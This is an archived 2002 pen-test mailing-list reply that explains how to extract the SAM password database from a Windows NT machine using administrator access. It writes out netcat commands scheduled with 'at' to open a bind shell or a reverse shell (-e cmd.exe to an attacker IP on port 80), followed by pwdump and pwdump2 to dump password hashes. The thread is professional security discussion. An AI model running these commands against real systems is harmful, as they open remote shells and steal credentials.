RE: Access to a win NT box

From: Panos Dimitriou (p.dimitriou@encode-sec.com)
Date: Wed Jun 26 2002 - 12:23:10 EDT

• Next message: Mark Maher: "RE: Access to a win NT box"
• Previous message: fotos@softhome.net: "pen-testing an Oracle9i Application Server"
• In reply to: Pedro Miranda: "Access to a win NT box"
• Next in thread: Mark Maher: "RE: Access to a win NT box"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

You can always upload any tool you like, such as pwdump, and then you
just have to execute it. In order to execute it you can:
1. upload netcat (nc.exe)
2. execute "net time \\target"
3. schedule a job like:
at \\target 7:14P ""c:\nc.exe -L -p 2222 -e cmd.exe and then establish a
connection (with netcat preferably) to port 2222
or, if the system is firewalled
at \\target 7:14P ""c:\nc.exe [your IP] 80 -e cmd.exe and have a netcat
listening on port 80 (nc -L -p 80)in order to establish a reverse shell.
After gaining a shell on the system execute pwdump and download the
results. Furthermore, if you use pwdump2 you can extract the passwords
even if the SAM is SYSKEY protected.

I hope this helped
________________________
 
Panos Dimitriou
Director, Managed Security Services
_________________________
 
ENCODE S.A.
3, R. Melodou str.
151 25 Marousi
Athens, Greece
 
_________________________
E Tel.: +30 (1) 6178410
E Fax.: +30 (1) 6109579
s p.dimitriou@encode-sec.com
" www.encode-sec.com
_________________________
 
 

-----Original Message-----
From: Pedro Miranda [mailto:rpmiranda@sonae.pt]
Sent: Tuesday, June 25, 2002 7:43 PM
To: pen-test@securityfocus.com
Subject: Access to a win NT box

Hi, I've got remote access to a wNT box using the command

\\machinename\c$ /user:machinename\administrator

So i've got administrator privileges but i want to access to the SAM

database.

I've tried to get \\winnt\repair\sam._ but i couldn't find the rdisk

comand.

Can anybody help tell me where can i find this software, or if there is

another way to get access to the sam file.

Thanks in advance

------------------------------------------------------------------------

----
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please
see:
https://alerts.securityfocus.com/
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: Mark Maher: "RE: Access to a win NT box"
• Previous message: fotos@softhome.net: "pen-testing an Oracle9i Application Server"
• In reply to: Pedro Miranda: "Access to a win NT box"
• Next in thread: Mark Maher: "RE: Access to a win NT box"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:22 EDT